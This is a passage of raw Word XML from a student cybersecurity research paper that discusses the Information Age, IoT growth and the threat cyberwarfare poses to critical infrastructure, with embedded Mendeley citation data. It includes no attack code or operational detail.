      <w:r w:rsidR="008750C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t xml:space="preserve">to gain </w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t>wealth and power</w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t>. The difference between the Information age and the ages that came before, is not</w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t xml:space="preserve"> just the rich and powerful such as governments </w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t xml:space="preserve">can use the technology for malicious purposes </w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t>but also every person who owns a compute</w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">easily </w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t>gain the critical knowledge of computer engineerin</w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the tools used to infiltrate computer </w:t>
      </w:r>
      <w:r w:rsidR="001A6E5E">
        <w:t>networks to</w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t xml:space="preserve"> further their</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> malicious</w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A6E5E">
        <w:t>agender.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366BB270" w14:textId="77777777" w:rsidR="008750C1" w:rsidRDefault="008750C1" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E2FC3E" w14:textId="213201FE" w:rsidR="003A3BD4" w:rsidRDefault="009570DD" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>30 years have passed</w:t>
      </w:r>
      <w:r w:rsidR="005D1DD1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t xml:space="preserve">since the birth of the Internet as we know it today, within this time </w:t>
      </w:r>
      <w:r w:rsidR="00302FDF">
        <w:t>there</w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t xml:space="preserve"> ha</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>ve</w:t>
      </w:r>
      <w:r w:rsidR="008750C1">
        <w:t xml:space="preserve"> been </w:t>
      </w:r>
      <w:r w:rsidR="00302FDF">
        <w:t xml:space="preserve">monumental </w:t>
      </w:r>
      <w:r w:rsidR="005D1DD1">
        <w:t>advancements within computing hardware, software and computer networking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00302FDF">
        <w:t>as a whole</w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t xml:space="preserve"> from; centralised cloud computing to the Internet of Things (IoT) </w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1109/COMST.2015.2444095","ISSN":"1553877X","abstract":"This paper provides an overview of the Internet of Things (IoT) with emphasis on enabling technologies, protocols and application issues. The IoT is enabled by the latest developments in RFID, smart sensors, communication technologies and Internet protocols. The basic premise is to have smart sensors collaborate directly without human involvement to deliver a new class of applications. The current revolution in Internet, mobile and machine-to-machine (M2M) technologies can be seen as the first phase of the IoT. In the coming years, the IoT is expected to bridge diverse technologies to enable new applications by connecting physical objects together in support of intelligent decision making. This paper starts by providing a horizontal overview of the IoT. Then, we give an overview of some technical details that pertain to the IoT enabling technologies, protocols and applications. Compared to other survey papers in the field, our objective is to provide a more thorough summary of the most relevant protocols and application issues to enable researchers and application developers to get up to speed quickly on how the different protocols fit together to deliver desired functionalities without having to go through RFCs and the standards specifications. We also provide an overview of some of the key IoT challenges presented in the recent literature and provide a summary of related research work. Moreover, we explore the relation between the IoT and other emerging technologies including big data analytics and cloud and fog computing. We also present the need for better horizontal integration among IoT services. Finally, we present detailed service use-cases to illustrate how the different protocols presented in the paper fit together to deliver desired IoT services.","author":[{"dropping-particle":"","family":"Al-Fuqaha","given":"Ala","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Guizani","given":"Mohsen","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mohammadi","given":"Mehdi","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Aledhari","given":"Mohammed","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ayyash","given":"Moussa","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"IEEE Communications Surveys and Tutorials","id":"ITEM-1","issued":{"date-parts":[["2015"]]},"title":"Internet of Things: A Survey on Enabling Technologies, Protocols, and Applications","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=5ce179d1-a8cd-4632-bc4d-c8f460bda078"]}],"mendeley":{"formattedCitation":"[3]","plainTextFormattedCitation":"[3]","previouslyFormattedCitation":"[3]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA44DE" w:rsidRPr="00BA44DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t>smart devices</w:t>
      </w:r>
      <w:r w:rsidR="0081670D">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00302FDF">
        <w:t xml:space="preserve"> which has</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> revolutionised the </w:t>
      </w:r>
      <w:r w:rsidR="00302FDF">
        <w:t>world</w:t>
      </w:r>
      <w:r w:rsidR="0081670D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>we live in today at an accelerated rate more than any other ‘Age’ in history</w:t>
      </w:r>
      <w:r w:rsidR="005D1DD1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0081670D" w:rsidRPr="0081670D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36696F04" w14:textId="77777777" w:rsidR="003A3BD4" w:rsidRDefault="003A3BD4" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="145FC9D3" w14:textId="5E852C15" w:rsidR="000A33E1" w:rsidRDefault="005D1DD1" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The ‘Information Age’ we live in today, although does not sound as intimidating as the ages that have come before us, </w:t>
      </w:r>
      <w:r w:rsidR="00302FDF">
        <w:t>it has a global reach</w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00302FDF">
        <w:t xml:space="preserve"> and if like all </w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t>previous technologies</w:t>
      </w:r>
      <w:r w:rsidR="0081670D">
        <w:t xml:space="preserve"> that were invented in </w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0081670D">
        <w:t>ages before</w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t xml:space="preserve"> the ‘Information Age’</w:t>
      </w:r>
      <w:r w:rsidR="0081670D">
        <w:t xml:space="preserve"> are</w:t>
      </w:r>
      <w:r w:rsidR="00302FDF">
        <w:t xml:space="preserve"> used with malicious intent by people</w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t>, corporations</w:t>
      </w:r>
      <w:r w:rsidR="00302FDF">
        <w:t xml:space="preserve"> and governments</w:t>
      </w:r>
      <w:r w:rsidR="003A3BD4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t>alike. The</w:t>
      </w:r>
      <w:r w:rsidR="00302FDF">
        <w:t xml:space="preserve"> technologies that exist within the </w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t xml:space="preserve">modern </w:t>
      </w:r>
      <w:r w:rsidR="00302FDF">
        <w:t>‘Information Age’</w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t xml:space="preserve"> we live in</w:t>
      </w:r>
      <w:r w:rsidR="00302FDF">
        <w:t xml:space="preserve"> today </w:t>
      </w:r>
      <w:r w:rsidR="0081670D">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t>integrated</w:t>
      </w:r>
      <w:r w:rsidR="0081670D">
        <w:t xml:space="preserve"> into every facet of our lives, from; Laptops, Computer, Smart Phones, Tablets and </w:t>
      </w:r>
      <w:r w:rsidR="00563B41">
        <w:t xml:space="preserve">many </w:t>
      </w:r>
      <w:r w:rsidR="0081670D">
        <w:t xml:space="preserve"> Internet of </w:t>
      </w:r>
      <w:r w:rsidR="000A33E1">
        <w:t>Things</w:t>
      </w:r>
      <w:r w:rsidR="0081670D">
        <w:t xml:space="preserve"> (IoT) ‘Smart Devices’</w:t>
      </w:r>
      <w:r w:rsidR="00A55FF1">
        <w:t xml:space="preserve">, these networked devices have </w:t>
      </w:r>
      <w:r w:rsidR="00302FDF">
        <w:t xml:space="preserve"> the potential to change the world order on a scale never seen before in human history</w:t>
      </w:r>
      <w:r w:rsidR="00CB4FBD">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0081670D">
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r w:rsidR="000A33E1">
        <w:t>technolog</w:t>
      </w:r>
      <w:r w:rsidR="00A55FF1">
        <w:t>ical</w:t>
      </w:r>
      <w:r w:rsidR="000A33E1">
        <w:t xml:space="preserve"> companies </w:t>
      </w:r>
      <w:r w:rsidR="0081670D">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="000A33E1">
        <w:t>governments</w:t>
      </w:r>
      <w:r w:rsidR="0081670D">
        <w:t xml:space="preserve"> don’t </w:t>
      </w:r>
      <w:r w:rsidR="000A33E1">
        <w:t>implement more stringent security measures</w:t>
      </w:r>
      <w:r w:rsidR="00A55FF1">
        <w:t xml:space="preserve"> and frameworks</w:t>
      </w:r>
      <w:r w:rsidR="000A33E1">
        <w:t xml:space="preserve"> to protect people around the globe from being </w:t>
      </w:r>
      <w:r w:rsidR="00A55FF1">
        <w:t>impacted</w:t>
      </w:r>
      <w:r w:rsidR="000A33E1">
        <w:t xml:space="preserve"> by the </w:t>
      </w:r>
      <w:r w:rsidR="001B13CE">
        <w:t xml:space="preserve">malicious threat </w:t>
      </w:r>
      <w:r w:rsidR="00A55FF1">
        <w:t xml:space="preserve">these networked computer </w:t>
      </w:r>
      <w:r w:rsidR="000A33E1">
        <w:t>technologies</w:t>
      </w:r>
      <w:r w:rsidR="00A55FF1">
        <w:t xml:space="preserve"> pose</w:t>
      </w:r>
      <w:r w:rsidR="000A33E1">
        <w:t xml:space="preserve"> that we </w:t>
      </w:r>
      <w:r w:rsidR="00CB4FBD">
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidR="000A33E1">
        <w:t xml:space="preserve"> use on a daily basis. </w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1016/S0167-4048(99)80006-6","ISSN":"01674048","abstract":"As the new millennium approaches, we are living in a society that is increasingly dependent upon information technology. However, whilst technology can deliver a number of benefits, it also introduces new vulnerabilities that can be exploited by persons with the necessary technical skills. Hackers represent a well-known threat in this respect and are responsible for a significant degree of disruption and damage to information systems. However, they are not the only criminal element that has to be taken into consideration. Evidence suggests that technology is increasingly seen as potential tool for terrorist organizations. This is leading to the emergence of a new threat in the form of 'cyber terrorists', who attack technological infrastructures such as the Internet in order to help further their cause. The paper discusses the problems posed by these groups and considers the nature of the responses necessary to preserve the future security of our society.","author":[{"dropping-particle":"","family":"Furnell","given":"S. M.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Warren","given":"M. J.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Computers and Security","id":"ITEM-1","issued":{"date-parts":[["1999"]]},"title":"Computer hacking and cyber terrorism: The real threats in the new millennium?","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=e893ee0e-7791-48be-b548-17f77ea339c2"]},{"id":"ITEM-2","itemData":{"DOI":"10.1177/1461444805056009","ISSN":"14614448","abstract":"This article traces the emergence of the new social movement of hacktivism from hacking and questions its potential as a source of technologically-mediated radical political action. It assesses hacktivism in the light of critical theories of technology that question the feasibility of re- engineering technical systems to more humane ends. The predecessor of hacktivism, hacking, is shown to contain certain parasitical elements that provide a barrier to more politically-orientated goals. Examples are provided of how such goals are much more in evidence within hacktivism. Its alternative conceptualization of the human–technology relationship is examined in terms of a purported development from conceptualizations of networks to webs that incorporate new ways of producing online solidarity and oppositional practices to global capital.","author":[{"dropping-particle":"","family":"Taylor","given":"Paul A.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"New Media and Society","id":"ITEM-2","issued":{"date-parts":[["2005"]]},"title":"From hackers to hacktivists: Speed bumps on the global superhighway?","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=3001feda-5399-4b2e-8ade-4e0642570341"]}],"mendeley":{"formattedCitation":"[4], [5]","plainTextFormattedCitation":"[4], [5]","previouslyFormattedCitation":"[4], [5]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA44DE" w:rsidRPr="00BA44DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[4], [5]</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4CD7FE" w14:textId="77777777" w:rsidR="000A33E1" w:rsidRDefault="000A33E1" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3481FADE" w14:textId="1D9CF125" w:rsidR="00A55FF1" w:rsidRDefault="000A33E1" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This cybersecurity research paper aims to identify security flaws </w:t>
      </w:r>
      <w:r w:rsidR="00A55FF1">
        <w:t xml:space="preserve">within modern networked computer devices that are utilised by people and governments around the globe, along with research within </w:t>
      </w:r>
      <w:r w:rsidR="00CB4FBD">
        <w:t xml:space="preserve">previous </w:t>
      </w:r>
      <w:r>
        <w:t>cyberwar attacks</w:t>
      </w:r>
      <w:r w:rsidR="00A55FF1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">future </w:t>
      </w:r>
      <w:r w:rsidR="00A55FF1">
        <w:t xml:space="preserve">trends within </w:t>
      </w:r>
      <w:r>
        <w:t>cybersecurity</w:t>
      </w:r>
      <w:r w:rsidR="00A55FF1">
        <w:t xml:space="preserve">, cloud computing and the </w:t>
      </w:r>
      <w:r w:rsidR="001A6E5E">
        <w:t>ever-growing</w:t>
      </w:r>
      <w:r w:rsidR="00A55FF1">
        <w:t xml:space="preserve"> market </w:t>
      </w:r>
      <w:r w:rsidR="001A6E5E">
        <w:t>within IoT</w:t>
      </w:r>
      <w:r w:rsidR="00A55FF1">
        <w:t xml:space="preserve"> device along with the how to further secure these devices/network to mitigate a majority of </w:t>
      </w:r>
      <w:r w:rsidR="003F42B8">
        <w:t>cyber-attacks</w:t>
      </w:r>
      <w:r w:rsidR="00A55FF1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160BE969" w14:textId="77777777" w:rsidR="00A55FF1" w:rsidRDefault="00A55FF1" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00291306" w14:textId="4BD85C03" w:rsidR="005D1DD1" w:rsidRDefault="00A55FF1" w:rsidP="005D1DD1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="000A33E1">
        <w:t xml:space="preserve">he research and implementation </w:t>
      </w:r>
      <w:r w:rsidR="001A6E5E">
        <w:t>of mitigating</w:t>
      </w:r>
      <w:r w:rsidR="004751E4">
        <w:t xml:space="preserve"> technologies t</w:t>
      </w:r>
      <w:r w:rsidR="000A33E1">
        <w:t xml:space="preserve">o prevent </w:t>
      </w:r>
      <w:r w:rsidR="004751E4">
        <w:t>cybersecurity</w:t>
      </w:r>
      <w:r w:rsidR="000A33E1">
        <w:t xml:space="preserve"> attacks</w:t>
      </w:r>
      <w:r w:rsidR="004751E4">
        <w:t xml:space="preserve"> within </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="007E41F9">
        <w:t xml:space="preserve"> large company such as a University will also be emulated using computer network modelling software Cisco </w:t>
      </w:r>
      <w:r w:rsidR="00D87B36">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="007E41F9">
        <w:t>Packet Tracer’</w:t>
      </w:r>
      <w:r w:rsidR="00D87B36">
        <w:t xml:space="preserve"> (PT)</w:t>
      </w:r>
      <w:r w:rsidR="007E41F9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"author":[{"dropping-particle":"","family":"Cisco","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"id":"ITEM-1","issued":{"date-parts":[["0"]]},"title":"Packet Tracer - Network Simulator","type":"article"},"uris":["http://www.mendeley.com/documents/?uuid=8fe7ffc0-7cb8-42c1-b080-a6765f308ee5"]}],"mendeley":{"formattedCitation":"[6]","plainTextFormattedCitation":"[6]","previouslyFormattedCitation":"[6]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA44DE" w:rsidRPr="00BA44DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C1E947" w14:textId="77777777" w:rsidR="00403E69" w:rsidRDefault="00403E69" w:rsidP="00403E69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="72" w:lineRule="auto"/>
        <w:ind w:left="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A01DFFF" w14:textId="06EC1E17" w:rsidR="007E1616" w:rsidRDefault="007C683D" w:rsidP="00403E69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cyberwarfare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D19DEE1" w14:textId="25E79801" w:rsidR="00F22121" w:rsidRDefault="00F22121" w:rsidP="00F22121">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within the ‘Information Age’ we live in today, there is a new frontier of the battlefield that </w:t>
      </w:r>
      <w:r w:rsidR="00DE0354">
        <w:t>exists</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> within ‘Cyberspace</w:t>
      </w:r>
      <w:r w:rsidR="002205DE">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00CB4FBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002205DE">
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can </w:t>
      </w:r>
      <w:r w:rsidR="002205DE">
        <w:t xml:space="preserve">have serious </w:t>
      </w:r>
      <w:r>
        <w:t>physical and detrimental consequences</w:t>
      </w:r>
      <w:r w:rsidR="00DE0354">
        <w:t>. T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">his new battle frontier presents a global threat to countries and governments around the globe like no other in human history, </w:t>
      </w:r>
      <w:r w:rsidR="002205DE">
        <w:t>‘Cyberwarfare’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002205DE">
        <w:t>empowers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> foreign governments and/or economical</w:t>
      </w:r>
      <w:r w:rsidR="00CB4FBD">
        <w:t>ly</w:t>
      </w:r>
      <w:r>
        <w:t>/politically motivated people  to initiate an attack on a countr</w:t>
      </w:r>
      <w:r w:rsidR="00534094">
        <w:t xml:space="preserve">ies critical </w:t>
      </w:r>
      <w:r w:rsidR="00FD4D5F">
        <w:t>institutions</w:t>
      </w:r>
      <w:r w:rsidR="00534094">
        <w:t xml:space="preserve"> and/or corporations </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">from the comfort of their own offices and/or homes </w:t>
      </w:r>
      <w:r w:rsidR="002205DE">
        <w:t>within</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> their own country</w:t>
      </w:r>
      <w:r w:rsidR="00534094">
        <w:t xml:space="preserve"> or internally</w:t>
      </w:r>
      <w:r w:rsidR="00DE0354">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002205DE">
        <w:t xml:space="preserve"> these professionally executed </w:t>
      </w:r>
      <w:r w:rsidR="00161DC7">
        <w:t>cyber-attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> leave little to no footprint to </w:t>
      </w:r>
      <w:r w:rsidR="00534094">
        <w:t>whom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> may have initiated the attack</w:t>
      </w:r>
      <w:r w:rsidR="00DE0354">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which has led to</w:t>
      </w:r>
      <w:r w:rsidR="002205DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cold war era paranoia from governments around the world  denying and blaming one another for cyber-attacks that were committed against foreign territories.</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1504/ijwgs.2012.051522","ISSN":"1741-1106","abstract":"Today the computer networks of numerous organisations in critical digital infrastructure industries, as well as those of the militaries and governments around the world, are under constant cyberattacks. Many nation states are now preparing for cyberwarfare. However, it is not even clear what cyberwarfare is, as the term is used in the news media. In this paper, we first try to define the term. Then we examine the status of cyberwarfare; in particular, the weapons, the US preparations, the fog and the law of cyberwarfare.","author":[{"dropping-particle":"","family":"Kim","given":"Won","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"International Journal of Web and Grid Services","id":"ITEM-1","issued":{"date-parts":[["2013"]]},"title":"On cyberwarfare","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=b42e810a-635a-4ee1-980c-4a354e0cc486"]}],"mendeley":{"formattedCitation":"[7]","plainTextFormattedCitation":"[7]","previouslyFormattedCitation":"[7]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BA44DE" w:rsidRPr="00BA44DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2157CCC1" w14:textId="4056C867" w:rsidR="002205DE" w:rsidRDefault="002205DE" w:rsidP="00F22121">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C52EB69" w14:textId="175F81FB" w:rsidR="002205DE" w:rsidRDefault="002205DE" w:rsidP="00F22121">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Cyberwarfare is such a concern for western governments around the globe because of how reliant they have become on computers</w:t>
      </w:r>
      <w:r w:rsidR="00534094">
        <w:t xml:space="preserve"> that are int</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00534094">
        <w:t xml:space="preserve">grated and </w:t>
      </w:r>
      <w:r w:rsidR="001F5148">
        <w:t>weaved</w:t>
      </w:r>
      <w:r w:rsidR="00534094">
        <w:t xml:space="preserve"> into modern western society, these computer systems</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> control critical infrastructure</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> such as nuclear power plant, </w:t>
      </w:r>
      <w:r w:rsidR="00A74618">
        <w:t xml:space="preserve">military weapons, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">water supply plants, hospitals, transport </w:t>
      </w:r>
      <w:r w:rsidR="00CB4FBD">
        <w:t xml:space="preserve">networks </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and much more that </w:t>
      </w:r>
      <w:r w:rsidR="00534094">
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> all </w:t>
      </w:r>
      <w:r w:rsidR="00534094">
        <w:t xml:space="preserve">be remotely </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">controlled </w:t>
      </w:r>
      <w:r w:rsidR="00534094">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">across a WAN </w:t>
      </w:r>
      <w:r w:rsidR="00A74618">
        <w:t>infrastructure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. If these vital arteries were to be exploited </w:t>
      </w:r>
      <w:r w:rsidR="00A74618">
        <w:t xml:space="preserve">and taken control of by a foreign government, a country could be crippled within </w:t>
      </w:r>
      <w:r w:rsidR="00161DC7">
        <w:t>hours without</w:t>
      </w:r>
      <w:r w:rsidR="00A74618">
        <w:t xml:space="preserve"> a shot being fired or the true identity of the </w:t>
      </w:r>
      <w:r w:rsidR="00161DC7">
        <w:t>perpetrators</w:t>
      </w:r>
      <w:r w:rsidR="00A74618">
        <w:t xml:space="preserve"> ever being known.</w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00BA44DE">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1109/MSP.2011.132","ISSN":"15407993","abstract":"The internet has to be considered a very dangerous battlefield. Nobody is secure. It is a paradox that those countries which do not feel vulnerable may be the most threatened by cyber war. This applies primarily to western powers and fast developing countries. Cyberattack may easily be ordered through the internet. Such an attack is cheaper than an attack by conventional weapons and at the same time it causes bigger economic losses. It is obvious from the military standpoint that cyberattacks and defence against them have to be an indispensable part of military activities. The reason is that the military consider the internet and virtual space to be the fifth area of employment of their forces, besides land, air, water and space. It is stated in the hypotheses that cyber activities will be an inseparable part of future military operations. The key objective will be to achieve information supremacy or information dominance on the battlefield. Thus developed countries develop and introduce new cyber weapons with the aim of striking the enemy´s command and control structures, its 